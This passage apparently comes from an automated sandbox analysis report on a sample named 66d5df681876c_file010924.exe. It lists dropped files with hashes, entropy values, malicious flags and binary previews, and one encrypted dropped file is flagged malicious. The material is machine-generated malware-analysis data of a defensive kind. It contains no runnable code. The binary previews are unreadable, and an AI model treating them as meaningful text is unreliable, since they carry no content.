,....!.p.3..$.A.E.......J..m5."....>.*.K...n-..l_Z....TBJ...d1Onl#.+..yj.?.$..V..5m:u..)..<..b...N...8........J.vy.......P.[.Q=...cX.l..'N9.....E.|..#.o.Y.-....,......kc.eG%B.qd...,.....r..[....S..BuT.)...@.Ulp2=:n.....9...vG.z. .$..8...g%W[.?Ge..._Ul8(...s..B4SD.=
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9763406629109355
              Encrypted:false
              SSDEEP:192:YfsPnG5vDrXo+pYWV3uhOLWgmUVRjDUatGxEVut9hZezyz3ituAcnvLC:YMnorrRh+A0ARjDUp9Guz3ilOvLC
              MD5:35835900EC676AC801147FBEB8A22F60
              SHA1:EB684353A34D49D69BEEC6CA5B14F65F73E1533B
              SHA-256:9A96C1C7A77ACAD72A9E206865AA3E6CDD29DF11835F9F31C4A68C1DEEE0D5B7
              SHA-512:A5ECC7AF847933C74DF7F5614047220CC913F27FBF841A7ABA005A49173EBFC59D77C27E8632AEC703A6FD3C611140A149119755EBC9DD30876E6CC0690355AB
              Malicious:false
              Preview:regf.jlv..........b.T.R.b+.g3..s.."...a.c+.'Y00...MbN> >.7...M-P.#c.G...q|.g@]W..\q......@..U.x..0...@AF.....U.bA..8.B..A>.>...o?:....v..`Ou.M.....\..K.~d......x3.1..oD..[4.....=...M....P..h.I....u/W..q..N.kg.h..Y...yv..e..S..[...W.KB}.B..$..9.......yd.....x.\..Fk.R.#........ V..,..-">.U9.....KDu.ac...ZT.....W.XY.F.Al.....y./.1..:.@.Y......L..m..g....[....q#.k.S.?)[.8..o.h,....T.6X(..2RR'..iO..P..h0...?.._....4$y......a.....<.....F....SQ.P..*.....ZT.;..JM,.X}k............\.4.o....H...R}@.I.1IF..g.F5g>..`.5.>D(Di...jVn...4.3..&.8.. ..V4^7.....L.0....37.......b.\.]rm+TVN...a/.<..a}........O..t...|z..O..O..."o..\.K. ..c..S......7OO....}3.p..(..9....*..8...6.-U...sm......f.......?.b6..5..r..tAgW^..(..4..dh.Pv.......g."..l...6A..._jy)...(;./w._t..,|jBi<.B?..^.+....,..bL.x.>.L.......=7.\.r.J.IP'.m.W\...B.......S<dX..p..'s~...M.O.7i.....S..O.]Nc..0...q..E..Cl.M...Z..>.6..t3..Ld.....q.'.<E.7...c..n.x...|J....Z.?.).>.....O.}.........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976141274461673
              Encrypted:false
              SSDEEP:192:Yhxy+1NiblexvlzjvKhHw29XKBtG5wCJVceDu2o+XpeyuCGqiD3GkjO0AEJJBKM:Yhx/CgxxvuwgCG5w8vdXp/iCGAEr
              MD5:1EBFF0D1011D8E09167690C9E6FF5A78
              SHA1:7342F259778A10DDB24AFA570DA86F9E48BA85FD
              SHA-256:F137472EC43D261C3D00C2CADE2E92AD59EE6127F5EA779604F124C5CA78A31F
              SHA-512:D0A80C98754E2C2F1BBAFC2F7A7EA016EFC2773EBE0604299A60F94414D36A1A0F7C8F0476C46FE995F3ED53180998073E8552ED02E721B920D60816764CADA1
              Malicious:false
              Preview:regf....~.4d.h.....8|2=....+...wS..`..v...t.........s...Aj..].F.9.0N.....au.=`e.9.{{p.(....Z..k.....o0.:.%k.i...:..b....._.Y.k.k.-...n.....:....D.5..]..z..p...~...UR.(._94u..w..k.)lN.9..Z...P.v.......v...=..x.@..w...t..D./.....N.).f.w.B.....V.{{.M..:.8....V..u...6....Q...=..V.Wg0................8..8$..z{s..WlR./....5...r....8..?..m...f.5Kg...<.c......:..r.o.N.......4._.H5?..i..@T.<Mo.{...E.00.p..8.t..KP.&..N... e...w15..|....^.....Q|..O9+..J../..5?...g"....@.L.:...U.x.^..(.>....|s.a.8..S.fW.p...Z..kDM..vo..$ @...K.!.p2".pql.....|...IC?.B.[._S...l.....S.!.,..VB/|........;HsX..1*N'U...cK.$b.G..WI.w.tw..c..p.`...Gx1.'..?.8.l.I.9:.....F............E...V~.536.0.....l. ...6...{;.@I.[;s.(D.G..X...^....)..l...G.7....@...T..B....2.o7h.mt...q.z.(.I.".[.......[j....g.1"....J=..{.E....._..K@*.........3.p....<..F...|..@4....T........OI.\\....[.....,...<..m..[.tq.....1.*........u).].cnl..E..]..J...([.^.....&k(..Sd..(./..@c.(.....[....z..?......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):107523
              Entropy (8bit):7.998297101991242
              Encrypted:true
              SSDEEP:1536:IvLn+21UmwWs8+lUtxfeep0Erb4oVqVWhCWRtEjeyUt4AizcAK38Tja25cS62A5u:ITZ+8Ko3088oGWhC8tEjedi05372al8
              MD5:4D3F2260009A3579CDA61FFC97C7DB92
              SHA1:8EBB4B5A425AB07ACA4559DF118BF7EB3DEFC842
              SHA-256:6A9DA30C4CDB4BC0688119A6C73D973D2463A668D4369C7F808B445FC6B8FD8E
              SHA-512:BBB7490DC43D3BD21D17B8B349B74EDADD0726098B8511FA6E10372E69F18C58DF701E8EF74BB056425694C4EECC5FA14C0CDC99911C7AD0EFD011ED91F4A8EA
              Malicious:true
              Preview:<!docE}@......J....J.K:.....H..d.E...o.;.+9.=..Z...t....t......W.K...|%..E..M$...`%$.k&...9...AVO1.y..;...z...u....{(....S.}{...&-A...C......C3+n...bMNY..n.xDJ..]...yQX...w.s_.7H)V}..DB.8.%]#.B1.!..{T...@h.y...X.]..._.v....(n>....jc. ......U..].'..Zvz..V.I"(m..k...y...%..S.o.]...Z$.....{........H..S;8...<X.....?.0...z&:E.Hr...1.g.Z..^^W.G%.8..."..k.]..sY......x.q..{g!. .j....e.H.=+c.AW3.W?..}..*T..xl...}...O].~..\.....^.3...=......^/..;V@.n<:..k....BZ.....@.8....z.O..F..za..v....b.*..w..eg.M..P..C..5A..%9.V..6>...z{..>..3/...{|DYB.a.........#,./.......Z}I;./.(".7HCc....=..l~%W....Q.H%:5...]3#.....7.,y....8.6u.)!.......% ....N....81f.(......%...................U..~E..S.....*....A.Sc...&H.gR..7......q.#+.5.U..nu/V.C.A..w..q....N...B.P.t...d......Cqh._..SW8..X?.. ..X.K..oSy..,$5.i\.&.uA.'O.v..x...>..%.FO........t,..B9.....-....vP...F....w...V.x._.O.......U......?...L....X.2......D....AE.t...=.Mq+Q..i< ..y..W...ut....&.%zL%+....c.k..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979394180215656
              Encrypted:false
              SSDEEP:192:TZC/+8P9zO/0hAWtjH38RmIkeYFywPMv5MD7Wllu97VL+NDz:Ts+8P9zO/DSInkBF7PMRS7V7YNX
              MD5:9A79CC1551AAD94E11AD532AAA6C0FCC
              SHA1:592CD07509EDC9A7439A3E2AD212F30A1725777F
              SHA-256:21F7A85385E888999D3EBE64A62F3691932B6DDE6774A70497D88B73155A130C
              SHA-512:383C864E80716920F4C121D86098890CB7229B23A546D79D332AEAE560FAD2104C0CBFDA77259DBAEB734B458043242458B9E6B99AB29B4BEA329469778FDDEB
              Malicious:false
              Preview:regf...6...).....{.....,O...[."..].....H.1..g.........+)...;M....6:...h`^..X6;.L.[9.wa...K..m.....B.7S..s.?.`8...g.Y.Z%.B..Q..k...:Z..:T%'O[].........}6).&\\........k.....9.]..z.?...=*.J..t.,@.........}A..)..m.e.=H...|3*J.....~}...a....^.).<.)..z].jK)x....q.<pL..z..a...8~=...N...ZXK.r.h.&......t.,..JkNZ.5..*.b$H..R.kv..HcQ.....Z.._E..eCE&....m 8?.....>.@y....OH.....Pi.{....'............Z..[..StH. ..:...c..O......(.&..Bi.H.c...i-|[.Mb...I%)c..(.p.....H...)..M.B.t..l.6~&..h./..B.g.....,..YH...P...A../...o..H.i8.E.x+..f....a]..9.s.9.kw...7U....O.dl..5.75+doR...o5~...`.1U..U..m{.....n........M....8.?v..<Si..^..m.C.AWA.i.a....~..'0.D.4-......=.E..A..W.O.z1......\..1...7.9...O..d...zd....%....y..?KYH....(.n.4}y.J=e'B.>..b.....KR..`"z..?...8........jU.X.h:h.C!...JI.H..4D..K.Q.....%.b..`e..)s.b.!.......lG...Y..Q....kGiD.#.J<..;....zQ6.......UZs..s..[...'.F`=.}..".<..6+.A...q....z7]..$ec......6...=x.<......e.6...|a.(...r..?.....1_T..-t'.9.]...X
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980699219579476
              Encrypted:false
              SSDEEP:192:6gp6nj3z+ri/D3X1JyAM/Y+fHL+HljOfmLsnGVyqJ:6gcLze0zX1JygHHljOesGVyqJ
              MD5:09B6F3C3DD421FE437B44132B0C44798
              SHA1:1BAA9B6A20B936341557354BB877EB182B40F44F
              SHA-256:1FEB233B19B923E867BD61D2F3BCD92B36E60834B9EACACAB8D8A2087D0C41E8
              SHA-512:EE2639DC912563A6BE940A0B7F220EA8D1EDC503AC8218175028F8CDF2B42BC8A7077F96817CFFD323809AD97E7401F40A327DA3C2186195930042D02C1F0513
              Malicious:false
              Preview:regf...*.....'...qK%..%B..#%".:.2<HQmcN1A.bA6.....+#...j..,_.......p....ZN..A&*m..#...c..q...4$.........?..V..smp<B.>F...}..X.H....T.Z.....P0.u.?....{...........H...C..I...fw+.,.N.t#.........]...x..$....=H+..0....r..3.oL.A....y..i....q....X3GL.g*..}...N.~..Y.Ax.....-d....Y..A..}p.Z.....<../:!....H..l2.4&,Y...Ppq.V...Q$.5.fm.C.....Y?...6...J0....B......q..[.Y.:C..@..t.B..Y....u$D.j)K.....H..U...].....9...".Uy;2Y...s...W.?...i..a.Q.P..(.......Gj/.f.......3.Q...&./...X..'........./Jj...,4'.C.d..F..do.C.....P....P.'.............17`..Hx..!....1.....aLS......U......]n.Z..B...&t..[Bfm.pl.{9.3.%).aU..[........7.*paX....N$z'U..^.6.....4F...7.%.....>.$.o<\v.-.......eE.....f..8.....zGq......O....[PD.,DA/!.;.![...v....M|...X...C.N..}$V....+..6_..d.ma..m+q..,......3..$Y.8!...+.T.^.c.a.-.j...&ML.....E-7.j...w.;#P!.GV[,Yb..2V.BQ6.dL.p.g.Y.Lq.:..D....n....!.*sfd.;...T...?..>.Z.v.~_...t..f..!Q_...l..o..ARR..r.........J.z]....7._V....I.f..!.M.!..i0......vj...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974738527132242
              Encrypted:false
              SSDEEP:192:85O8w8t2LsrF5v6fMhiEz/0YpNvNq0o1IZbeiSgH9yYdCiZqZFOr5l8EZmooz:85PvALsRBsMv/zx4YmgdPtPr5lF/oz
              MD5:6BB2C11DBE22229E79400C793C530F3D
              SHA1:3408648B2E8CC05F4DAD9CA367501C1A7800B393
              SHA-256:3BB672BE7794DA303777480283386E6407BB05EDBD1EBDB8A368CD38DE32954E
              SHA-512:5799804BAD29D4C3C8DB4E7AE48F20775B04D8341D6BB9F63E8BB0DA02D77A992F351B123F897E2FCBF5B9EE3B71FB500D87253923705F38BBCEDA7A84D6DE7D
              Malicious:false
              Preview:regf....r..u.uzv!.k..D.;..lu7..(..............;..+...N....N.._.....h..e.i....../....c{#.".|t...N....A.&.+H..n4........g}R...?Kt.......w.q.Y@....!.v...[.........l.Rg.\.4.......X.....t.\.Y.W.9;.......Q.4y.......U.@........4...R.MM..{4....A.I...YZ.2s........@....n5:.....B?z....0.^.....60.....%4E....5..`...a...)u..z.(...=j.C..J...1...$......k..5_..u..a.p...N..}..IO4..H..e.:...5.a.].(.ux.Ln.......5.eKVH.)E.{....{.`M.Uy........S.%X..{.@V.H....x.....^...-5P2.z....+:....^...6..a...t:...0.d/pzcb.H...R*....]...."h._.0}Z".....'_..]....n.8.%c..]....i8.. >.......R......1..;.......r..A.3.. .HV...'.W.V.d..|.|....C...7. .:...PeI..z.M.L....r.V....z.. .7.h...X$9T.>.,. .X......dDyf..L>E...i...L.eu..l..:\C...JC"O.,Lm.... .._.........|.p..B.........QvA....I4o'...X....K.^C"..a}_.._....!...C%Enr....C..GR.r)&06.G(()..0@^`u$...!n...U.X4.x..g?........a...HI....P.....Q%#!..*..R.R*x.y;L-.S... 8..$...g...|=..pq).(....N.]..R..S.............V........M..gA$3..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.975071296237989
              Encrypted:false
              SSDEEP:192:5QZzJJ3etP185FAjA31V54eHdhppZFKiVZcpL:6JJ+1VjA3X5F9XF5VZcpL
              MD5:B1CE1A9126C2DAE9B044C3C84B01267E
              SHA1:7D99DBE43F2C97722AED2377121605535E56F315
              SHA-256:82AAF82B1FC4D752DCA54B2A560390709B1B9FE74E81E6F7BDBE44FC8A95C712
              SHA-512:0038FD40157B92284758E0C747DB59E7241884FABAD40471D93D4F35E97AE87955A22AD9EE8AB2CE64D5EB71BBFEEF99036652AC0A96A35D91C201F7A91EE346
              Malicious:false
              Preview:regf...c?.....;.=..>s...x.1....<.I..h.pO...*`8...]U..X..M..^.m=R.fY|......z.cj.5.s...8..{r....4...c..k....A.....O..../...].-.9...$.O..Yp.W..d.T...Lt......'.3_{%.O..&......z...w.e....>.]...l.y....aJ&..oJqC..H.Y*d..b.!...#...*..m,#L.PU"').R.;...-.....J>~...?.~..9..1q..^...32..&K]..a.|...f.....*.....Y....A-:.(...$...k.>.E..>{.h..Y[1../...L<r.tgu...r...-mwF..d'........4R.....z..g......1(..).`....*..p..a.[.].X!.A.........T.i....l. .k..?...c......@..../.9.HU>g.....t..<..=..?..a.8.....Lm........{5[9....=9......).X...>..(...@..0..D....'n.h.H{..~.:.B..E.....|..].Ak.B........z.i..e.>.kmI$&.H..m%.P>..CE..U f.:Q..s.....,.*..."IrD^P)8/A,#.zM...z..>..o...d...o..5<......M_...I...C2!.:....#5!..y.T..q..@.....pV...Mo.......;D...=....K.S..E.T.<#%..@....b@.%{....h...@.,.F....kx..3V...(...8.{6O=.p-.....w....[[w.s....g.B`PA.....dbh...m..hN...M....f....Y.]n.....#A.o....?....D.:8D......5!`j..........|O..H......tP.. r....1..p.....R..~v.6.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979312964965059
              Encrypted:false
              SSDEEP:192:fY11fzaX9+qWLBGnFVehxsqmDVTlW+eE2tpDaArUYJsJYVWRO:w1h+N+qWLArUxXYC+eE2b2GJ1aO
              MD5:A54BCCFFACD722B3A4603700095252A1
              SHA1:C0CAC2C0183051A04EEE2C7E486B805AE215EE1C
              SHA-256:DDCB92DE46356502BA9DC55E85CF00CEAAEE627B3DE3F5602CDAB69D188BF389
              SHA-512:B6248E325FDE2CC3FC48560C3567E4A397152251A5B109035A1D7F9904CDD8EA918BA771E90787963321604059FE1B58BAAFBC28618930A0E91CD2A741C2B048
              Malicious:false
              Preview:regf..%...!..;lZ....z:........F@.$....c.>.S.k...Z....P..M).n;EN.7:%......Z1.w.T...Y..1...Eq.l.Z...O..."a..W..U..{U[....6.0S"+2......|...5......K.....7Y....9.7.Y=Nh.h.K.A.[.pz0H..j..8..lF_..7...b...E...g@.;x.T3..H.$_...r.....2+..G_a...G+.._s.=..g.z..RV...q7.5.A.h.k....v.d.>.x..H..Z..b..@..:pg..........Ou.x5vkZTT.-.YTO........d6..I.......vx...T....-co...W..c...0..........<.......@..K..;g.;.Z..4.[C` .LE.v~....Qr.j...ov.....1..?.....M.S..?X$.#.%..l....5z`...mb..y.2&.....1.I.{..:..Pe'...O.bu.. ......Y9.....D.?}..1.d....PO6.<[....Ib.+}s..uz....#t..HF|C.8.......ci..g...VJN1.K.u.q.q.bm3......\.u.'d/.s<...xv.j..E:.0.]h.....m........u..=ou.bZ.[E.....~3>8..1..+..!m..s.p..<......L....4....oo....C......._t.....^..tQ....EO.F.+.Y.C8.....Kv.d...|.>w....Z`...(b..{.6...#T._.w./z..]....a.....T5....*.b..\....2.}...X..3..iW.;.._.:....l..'o.}.]3.DB.$iM. B...n. ...PP.r.3.0.'3.UJ.4.....~F.z.4P...r~&.....uw^...I...Z..?.b..(..8..a.O..G.".AI..~.lY..-.=K.=.8
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978352029455497
              Encrypted:false
              SSDEEP:192:jUtjHAIMwC5UOs/3g8s8IwsluHfrVjaVrWS2po2+zYi9Q:YtrAIc5UOs/38bGDVjrxO2yYT
              MD5:D0512712B969FA97D0C83351E9E5BC29
              SHA1:3D8D2E97426AA2D4C2D93A0816E23CEE8ECEAC54
              SHA-256:70E4B9B5C5231C760ECA6C8669B2F2A276319856A3BD18EF74293D33FFE02EF7
              SHA-512:BADBDD51A1530DBD5BCBFD8128517269CEE42C66C884258A784899D0826F88079A39CB3E22F0F9EC5F25A5E0B5B2E875C198D3BB58BFC284241F2FE595976C8D
              Malicious:false
              Preview:regf...c.iN7q=...R..g...S!..f{.....-f.j.$.o.p..eBV=.2~.MOSQ.....0.|.x..]..).o`-....&@...C..P.B.(....,X.+y..~R.lU...C..#p..(}O..(x....~.a..P.(y..#.N..n..v`.........X...t.\...Y'.+Zc........I.D?u.L..&L.$....G....Y.[9`l.o.s.g.0&t.8..)3....5Y=.i.[..7.3.`.)..J..."..C...U.3..L. )p._C4eN2............q"..a'MT...F......}....lx...f+........*.,Q.<.Bo....... ...7..~&;5.G..,..;../O.....P..]...j....G.mt".O..d....zT.3.....kI?= ......O..1.~....6sl.N..Nw.........7X..F.(R.../..qH.'....r..Q.*......`......vi.x.<...yyK.:o.q...,YC.jV.]GKI(.p.D..sssy..z.....^H......4..m?...6-..{|....0..,C.?.W.!..L....]........z.M,.3.4.rqxc...(Z....X...:5q...7.<...m..)...'-EMu.{..r.1*..qd...sH.O.`*G[....XNFg.G.D..8.K....N..s.".r..l.)..L.lN...mO...{ck2..M%q.U7.).yU&..I&..}.H...>...M.K..7.....^....N.1#.GXNJ?.."......./....P....=..y.>.~..c..g....@9+.....i..usp.S..WYHv{.51,.".q...wc..(.T..r5...`..._..=._.7cp...`~.vdL.v..}.R.....}.)m.....j.'CM.L......%4.....JXW..3.......db0i`..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977566276909876
              Encrypted:false
              SSDEEP:192:eKVULuiOPCLZ/RqsnwLlElI9Py/CIsTSJ:etW6LDqswqlI9Pqfs6
              MD5:BC9801DDC885D1685DAE08CE848F57DB
              SHA1:1488B3712EDB635503C5765382FD915C30DC9C7C
              SHA-256:37D764784CAB9E419418F8FF628A15832AB2E23E0B6A074BDEB7330348443C8E
              SHA-512:9701A7973F63E13CAE55B878B751988A76BED0DFCE2E0819FD126D2278533A1A85C5F580CE3D0942EFCF31FF17AF63B0B271BF0DF1CB76C00BEEBF7A17FD7E96
              Malicious:false
              Preview:regf...~. .o....4._..&.T..b.....i...ya_<..Z..D%...N..Wc....g.....>.....9.H.. ..S...}y.....H.EAf#?..Y.d.....,j..=l&d....lE.%A......vn7dO...78Gc.pdS....W.`X..#..3..R.3.>.,.g.._{.d.i._....4..n..k.-......h...........}.|(`.QO..._.:E.....#...5..&..<..5.1... .."...U.k....Nm.!..E....C_Wt|...^......mBW..F...c.wm.?A..?..C4B..;..9.#w.*w._.5..TS..Vw..0#.}.^n1<..i.%,.w}....M.....4.. ?j......t->L+.r....U8h*c..Z..:...A....aY....p4.\&.<......]...-......M......w....W"......z....|...)~..PT#.:....mqL?.5.&..Q....XV.BL.`..3....Z\[.._N...X.u....9.#...(.r.....(<b....|.5.w..f.r$I.......B.dQf)#u....+b.....E......-^<7.L.|..0P..h..N..W:}l^..~m.=$.W.;.....s...WP.:".? ...F.k..&...'F.`.5A.C..ea|V6....7UD..8..aY@r...#......I.y;.5.].uxN...(LD..,..../.S_..%.A...M.."2.W7...U.p2A....qB..S5.....<.>.h.WM.2.......z........Yw........<..y..@).?...a..X...M.."'V0$:..m....j.K~...|k.".....t..rCp...../H....F/.......v........E.O.L<...bo....8].:.e...Tb.......-%X......j..EN..Xo-
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977241578897203
              Encrypted:false
              SSDEEP:192:648olTugEwtmhm2Eep95aOnRXZ9AsevqrmjR38YznFMhl02uOiyTKq:648aT7tH2Eep9UOnFZUP8YbFMLuO7Oq
              MD5:5C969E8F47B5331F1AA0DA6F7913AFC7
              SHA1:D8BB9FF340A1F945EE9A8451CC39AE96E19E76BD
              SHA-256:D38AED7E095FA4CCD476C212E1D93F0D13395C5E1C92D406093BB07A7534D99D
              SHA-512:E03C012CF3F6236D7ED62BBB55595ADF5AAE6D3A5E96398AB31D7B462A5CE9CC37556518CEF865632E7ED06602A46F5A023D1A9109581FDA23C9AC4BD73C8555
              Malicious:false
              Preview:regf.)2..y0.:J}8<xu#.-8....b.P...k@.......N2:.%*!.m]._..\J.`..J.*..I..+..EK+.......S..I..x......!..X......<.A3..s.."?.8.B._.........#.d.4|p6....D.TR..!g.2..^....O.g.._..:g....I....?..U.. X*.o.t@.zI.j......=../.9`..ib..`y[.z.*.X..Hh&(.A...t6....q.%G..p..."5.9.4%..c.|.....SJ,O.....U.8V.T....N..t$QV.....HEh..{z......L.Y#........a..Q...n.x..?Gz...g.t..q(..Z.m..J...o:....v.J.!7k........s..oE..w.s:=....5w...M.<3a....r............b]h..L.......=.,...T......A..........t.......5O.'.|.sW....8...W....z....Qr;2..j.._...o.V?O..A.P^...&......a..F.5.....x..,..MhGe.O...6/O."-.#.,..'E....-.,}..e..t....@...p.ri.3.h.G.T+..{..~!..-.2.. ..r.......m.;z.....uD.........fjG....Y...}.f..Q..j.H../.Y^.X.q..&.........n.$..&...MOy..M}....t...G;..;.d.....?z.f2k.7...n........E.......n..'.#>[.....-..'.Ir..H.pa..0...7....$.:!R.....f.=@I...]..J.R...}...{v?C(.gR..0..C.../....S.Z..Zu.:|.8d....[.A!d.q]-. X...y2.rC.0#.....=..}n..4..m.-U....t.........6.J..E*lA.)..Mc...[,#U+
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977532665294436
              Encrypted:false
              SSDEEP:192:koRb9btGFtXlSmeujGWYb9EZgp5CeOuNxTrT3gXI7Ry3lJS7viGl:koRp4j8mbj43rXTr9ynSmE
              MD5:18277863009B939A5D948FD4DD44DB43
              SHA1:80A8A25460D3390FA479540C8F3FB7E7C37B9718
              SHA-256:F2E9720B880DFB534CD97649751CA296122859B09E3144B6F218F91B2FA9E85B
              SHA-512:C2263F1EDA87BC5047C937900BB9AD6E02EBAC02EA5F24440E2BC0801201B522236D5EFE8EA370B74CC1BFBB84E913FB9C79EF69397E23B4FFB4808B563A696F
              Malicious:false
              Preview:regf...1.r{;0.%....s....pK*.Wk..U..8....,...a.....0"2Kl}..._...s..}..o.=H.WY=/.2...A..C.....{@..r*.(}2.6..-.{.....?....u-...#.VeS...|9<h0......U......`.v$mL....S......~..%G.....Q....),.z7.[........h...D.....K.-.[(...Iy..5...N...G-.......u..$...8..h.P1.ea..=.y8]....;O.hug..0....b-X.,...T.......b:.U.....v....i...[..x.hx.\..t)`.....:!++a@...C.&.So.xe.j.[.a.&...s.<.....jbI.'..+1.Y*E....*...77........mu..@..x..........-:..+..Y....a...]..S0n.....%...$3.-.>X..K.".~.h.u.F...,...B..t..a~...r...N....Wn.....R.]..1 ..l.....0............To.....P.wE.4VBo.uF...T..jT..........G./..]./.*....y..L8.I..........zh..#..[T....F.l@..E.G.@v-.......8.....*....d...'.f..Uj.B.}...P......wJ..v.<O7....hZ....y.....#A.....RQA...l.l4.].(]..].0.h......T4~'.5...!.E...1....p.0..w......=....].....r.Cj.q.u?...S........=.sp}"d._.o=`n.....K.%kMD..H.P.].4......A;O...<.~2....5...D.5+4.6.##k?...o...A..*.A ..,T..E.t.-L..b.i..?.Sd..].....w..~(!..7..]......aM../L...N4..|......\9
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980364942955137
              Encrypted:false
              SSDEEP:192:YUMBKru715o2iugTs6TUTt/3xXSEpmp6ttPNYbasxhbdhyeNgljj:BMB685TiuGTTUpiE0oHPNYGsny
              MD5:46223F1AFFA57DA895B334C317CB976D
              SHA1:674B978FC8EFAE7CCF5DE21DA1117270E8B66BC4
              SHA-256:9260580506358139B006D2C3EE088EA2B6162061F3DDE3A78E6410BCC04C8A2C
              SHA-512:73F66068BFA294914957DFAE80D3D339E8F843B1C88CAB6F0182FB38EB6E8A95AB4F0D567A81DFCA6609A39814A29A5898B7DBB43FF7682EDE4335C98D512A98
              Malicious:false
              Preview:regf..?[D...E...Y.e. .....NUU..^hPN..r.=.1.6..7.gis...g..A......(.2.I.9...h...o.zd. GJ~.:A.n....|.h......2.....R.......D.q.......da.$+q[..j.e..0r.)rQ..@..B..u&..94.({..?..820.{s..bo...]s.G.S........I#...........T..F......bd..6......RM..<#..<~Y..j..M./ X..#^.HYg............RmZ5..a.....Pd.D....1.K.q.p..,.f.;..g.QJ1..2.+..i..x..n..]>.>}...(.....9\.;....g.....y.S|....(=..*".........~."<u.....z....K.d.._m.....'.gp......=,E..G..`5=.f...MO..i.X!........{b1.Hz.&y..Rv..P[...@J;.&...{..=...2Br.B....3..f~.h....t..L>tsZ.P.S..}M...:T.......%.e..h......$c....]{r.B.>qP.h*......V.....R...m@..,.....+}.9z.|..:.T+..X...0..J).\.....'.c....HQK.!Y}......q.p..X..(..?.I...=..G..j..m-(k..q..V:.............Q....L..^me..P.UUX...;@.bY.......2..8...5X2.M.d]/...^."..HW.A".9..}x.yC"....*.U-..............;@Q..$....P.....l..........1...o.....c.1}{3..#I..v.e....@..1.....}..sC...DQ2...f...;6..z-...R.n..../..GF.h5..5..i........<.d..8'&./..........J....A..J....A...........9;.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977948076339911
              Encrypted:false
              SSDEEP:192:IeUKxLMRr6wynU103t4fXzTJ+Y2O7K7b1cIXvGWs:dLMCnkut4zTJUKK2P
              MD5:D144FB95076633F2700C5D91E617D6CF
              SHA1:929236BA0FB2E3B50C8EDD15BD29FD4A41AD125A
              SHA-256:6E28352D3796CBF296946C79FF551B39EE4801260077D5A656EC01216D4AD7F2
              SHA-512:A7E0A569134C1DA4A417FF283653888C0E6690DED81C9184C531BA9223D35C0CD174CC508FA83F99ECB3CDFB23B67BB7F22249EF9267D8A9AB9C402EB81BE8DD
              Malicious:false
              Preview:regf.....N{"b..6..&.....)........X&.,..d.P!.e.........x....2.g..=.vZ..... .!.*f...=.W'c.n....X..... r...1..........g..:!=)......C..>....g.......W.F..(..o9}...mS._i~..!FRg..|.z;jQ..Qm..Z........y.....<..B...og.....i....?..U.{.......\R.i....>..u.M..o..C.h....iXl..N#V.g....km..|<.w..3...r.qz...E7?.R.....5.m.Y._"....vrG*}4j.....4.#........M..N.o..m:1........H...?..O.......Oqa.t"....y.'......G.e.T._.,... o...s.Ql...y.l.>...Q......<`..Z..R..;......p.(z.g".m.1.4i..DE..u............i[..N+.....(.*~...r9...P..q~A=..h.l......'JhR......S....D`V.j!..._.B.q....$...#.........2...;..t.K...xzv.Sp_.B.2.X...;..f.x5ML.r...-..i.....L.J7........g+L...K..m...\.-.WV..[.........7.t.U,_..i .....m:V.H.#.;l...q.........N..4o...g.hXz/M.....=..3....^...87 ...L.b.oD.q.57.Z!...o....8._.....@.,..~T.r......1......H.L...].?$Ut.....&^..._..z2...........,??;.g.$.)..Qu....."7.|.Bj.*.(\.]...p......%T....`.......@L.us./.....Pc....S..,..i.z%..&.S
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980058032822589
              Encrypted:false
              SSDEEP:192:R6+O0bK2nmvt/dmx1UvTF35Czk0Sq5Q+0r4GEVUyNrMUPmQBewEuU1cS8wFc:RJKTQU7+4U5X0rjEVRhNrlUSS8wFc
              MD5:881DE857A5FD20FC8568DEB72138A923
              SHA1:0591519D6298C2BD1EBB54BD14E8E1F8DEFF7EBF
              SHA-256:8AAED0374C46C30365904366A5B4948C6A543806E8D8B86E876456657EECCB8F
              SHA-512:590BA6C4B2FB07F0176561019EEDCCE8B168B3567903303993AC81AAEF78CB2150F2146EE944E553CB89FA6495CA3A81A7854FB576F41FD6165AD0339C1608A1
              Malicious:false
